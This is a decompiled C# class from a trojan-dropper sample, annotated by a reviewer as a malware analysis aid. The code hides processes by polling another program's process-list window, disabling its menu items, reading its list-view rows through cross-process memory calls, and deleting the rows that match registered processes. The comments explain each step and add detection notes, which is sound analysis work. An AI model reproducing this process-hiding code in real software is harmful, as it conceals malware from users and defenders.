// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using \u0008;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
namespace \u0008
{
  // NOTE(review): decompiled, name-obfuscated code from the sample named in the
  // "Assembly location" header. Several distinct members share the identifier
  // \u0001 and are told apart only by their type, so read this listing as an
  // analysis aid rather than as rebuildable source.
  //
  // What the visible code does: it keeps a list of (process name, second string)
  // pairs and, from a background thread that wakes every 10 ms, inspects a control
  // inside another process's main window and sends it per-row messages for rows
  // matching a registered pair.
  //
  // The native wrapper type \u0006 and the string decoder are declared elsewhere.
  // Every Win32 API name in the comments below is inferred from argument shapes
  // and well-known constants and is marked "presumably"; confirm against \u0006.
  internal static class \u0005
  {
    // Invoked below as \u0005.\u0001(<int>) to obtain a string; presumably a
    // string-decoding delegate set up by \u0003.\u000F() in the static constructor.
    [NonSerialized]
    internal static \u0002 \u0001;
    // bool: set to true once the polling thread has been started.
    private static bool \u0001;
    // DateTime: time of the last once-per-second command sent to the target window.
    private static DateTime \u0001;
    // int: item count seen on the previous pass; a change triggers a rescan.
    private static int \u0001;
    // bool: set when a new process is registered, forcing a rescan on the next pass.
    private static bool \u0002;

    // Registers a process with the hiding list. The first call also starts the
    // polling thread; the entry adds itself to the shared list in its constructor.
    public static void \u000F([In] Process obj0)
    {
      if (!\u0005.\u0001)
        \u0005.\u000F();
      \u0005.\u0001 obj = new \u0005.\u0001(obj0);
      \u0005.\u0002 = true;
    }

    // Starts the polling thread: an endless loop calling \u0010() every 10 ms.
    // The thread is not marked as background and has no exit condition here.
    // Detection note: this produces steady, high-frequency activity against the
    // target process for as long as the host process lives.
    private static void \u000F()
    {
      new Thread((ThreadStart) (() =>
      {
        while (true)
        {
          \u0005.\u0010();
          Thread.Sleep(10);
        }
      })).Start();
      \u0005.\u0001 = true;
    }

    // One polling pass. Any exception is swallowed by the empty catch at the end,
    // including the index error raised when no process with the decoded name is
    // running, so failures leave no error artefact.
    private static void \u0010()
    {
      try
      {
        // Main window of the first process whose name is decoded string 2426.
        // The decoded value is not visible on this page.
        IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
        // Size-prefixed struct filled from the window handle; field \u0003 is then
        // compared with 1 and 3. Presumably GetWindowPlacement with showCmd
        // normal/maximized, i.e. flag1 means "window is visible on screen".
        \u0006.\u0004 structure = new \u0006.\u0004();
        structure.\u0001 = Marshal.SizeOf((object) structure);
        \u0006.\u000F(mainWindowHandle, ref structure);
        bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
        // Control with ID 1009 inside the first child window of the main window.
        // Presumably FindWindowEx followed by GetDlgItem.
        IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
        // Menu navigation: presumably GetMenu, GetSubMenu(.., 2), GetSubMenu(.., 1)
        // and GetMenuItemID(.., 0).
        IntPtr num2 = \u0006.\u000F(mainWindowHandle);
        IntPtr num3 = \u0006.\u0010(num2, 2);
        IntPtr num4 = \u0006.\u0010(num3, 1);
        uint num5 = \u0006.\u000F(num3, 0);
        if (num4 != IntPtr.Zero)
        {
          // Message 273 is WM_COMMAND (0x0111): simulates choosing item 3 of the
          // nested submenu, then alters that submenu's entry in its parent with
          // flag 1U. Which menu API this is cannot be determined from here.
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
          \u0006.\u0010(num3, (uint) (int) num4, 1U);
        }
        // Applies flag 1U to menu command num5. Presumably greys it out so the
        // user cannot trigger it; confirm against \u0006.
        \u0006.\u000F(num2, num5, 1U);
        // Called with the control handle here and with IntPtr.Zero at the end of
        // the pass. Presumably LockWindowUpdate, pausing redraw while rows change.
        if (flag1)
          \u0006.\u000F(num1);
        // At most once per second, sends WM_COMMAND with command id num5 to the
        // main window and records the time.
        if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
        {
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
          \u0005.\u0001 = DateTime.Now;
        }
        GC.Collect();
        // Message 4100 is LVM_GETITEMCOUNT (0x1004), so the control is treated
        // as a list view and num6 is its row count.
        int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
        // Rescan only when the row count changed or a new entry was registered.
        if (num6 != \u0005.\u0001 || \u0005.\u0002)
        {
          \u0005.\u0002 = false;
          \u0005.\u0001 = num6;
          for (int index1 = 0; index1 < num6; ++index1)
          {
            // Read up to 10 column texts of this row, lower-cased. Stop early when
            // a later column repeats column 0, presumably meaning the control
            // has fewer columns than were requested.
            string[] strArray = new string[10];
            for (int index2 = 0; index2 < 10; ++index2)
            {
              strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
              if (index2 > 0 && strArray[index2] == strArray[0])
                break;
            }
            // A row matches an entry when one column starts with the entry's
            // process name and another column equals the entry's second string.
            foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
            {
              bool flag2 = false;
              bool flag3 = false;
              for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
              {
                if (strArray[index3].StartsWith(obj.\u0001))
                  flag2 = true;
                else if (strArray[index3] == obj.\u0002)
                  flag3 = true;
              }
              if (flag2 && flag3)
              {
                // Message 4104 is LVM_DELETEITEM (0x1008): removes the row from
                // the displayed list only. index1 is stepped back so the row that
                // moves into this slot is examined next, and the cached count is
                // decremented. num6, the loop bound, is not.
                \u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
                --\u0005.\u0001;
                break;
              }
            }
          }
        }
        if (!flag1)
          return;
        \u0006.\u000F(IntPtr.Zero);
      }
      catch
      {
        // Deliberately empty in the sample: every failure of the pass is discarded.
      }
    }

    // Reads the text of one list-view cell (row obj1, column obj2) from the
    // process that owns control obj0.
    // Presumed call sequence, inferred from the constants: GetWindowThreadProcessId,
    // OpenProcess with access mask 2035711 (0x1F0FFF, PROCESS_ALL_ACCESS),
    // VirtualAllocEx of 1024 bytes (4096 = MEM_COMMIT, 4 = PAGE_READWRITE),
    // WriteProcessMemory of the item struct, message 4101 (LVM_GETITEMA),
    // ReadProcessMemory of the 1024 bytes, VirtualFreeEx (32768 = MEM_RELEASE),
    // CloseHandle. Return values of these calls are never checked.
    // Detection note: a full-access handle to a GUI process plus repeated
    // cross-process allocate/write/read/free of a small region is the observable
    // footprint; the caller runs this up to 10 times per row on every rescan.
    private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
    {
      \u0006.\u0001 obj = new \u0006.\u0001();
      IntPtr hglobal = Marshal.AllocHGlobal(1024);
      uint lpdwProcessId;
      int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
      IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
      IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
      // Item descriptor fields, told apart by type in the original: a uint set to
      // 1U (presumably the LVIF_TEXT mask), the row, the column, a text pointer
      // placed just past the struct inside the remote region, and a capacity of 50.
      obj.\u0001 = 1U;
      obj.\u0001 = obj1;
      obj.\u0002 = obj2;
      obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
      obj.\u0003 = 50;
      \u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
      \u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
      \u0006.\u000F(num2, num3, hglobal, 1024, 0);
      // The text sits directly after the struct in the copied buffer and is
      // decoded as ANSI.
      string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
      Marshal.FreeHGlobal(hglobal);
      \u0006.\u000F(num2, num3, 0, 32768U);
      \u0006.\u0010(num2);
      return stringAnsi;
    }

    // Runs a WMI query built from decoded string 2439 plus the process id, invokes
    // the method named by decoded string 2504 on each result, and returns args[0]
    // when that method reports 0. Otherwise returns decoded string 911.
    // Presumably Win32_Process.GetOwner, which would make the result the owning
    // user name; the decoded strings are not visible here, so confirm.
    private static string \u000F([In] Process obj0)
    {
      foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
      {
        string[] args = new string[1]{ \u0005.\u0001(911) };
        if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
          return args[0];
      }
      return \u0005.\u0001(911);
    }

    // Type initializer: calls \u0003.\u000F() (defined elsewhere, presumably the
    // string-decoder setup) and seeds the once-per-second timestamp.
    static \u0005()
    {
      \u0003.\u000F();
      \u0005.\u0001 = DateTime.Now;
    }

    // One registered process: the pair of strings the poller matches rows against.
    private sealed class \u0001
    {
      // Shared list of all registered entries, read by the polling thread.
      public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
      // Lower-cased process name, matched with StartsWith against a row's columns.
      public string \u0001;
      // Lower-cased result of the WMI lookup, matched for equality against a column.
      public string \u0002;

      // Captures both strings from the process and appends this entry to the
      // shared list while holding a lock on that list.
      public \u0001([In] Process obj0)
      {
        this.\u0001 = obj0.ProcessName.ToLower();
        this.\u0002 = \u0005.\u000F(obj0).ToLower();
        lock (\u0005.\u0001.\u0001)
          \u0005.\u0001.\u0001.Add(this);
      }
    }
  }
}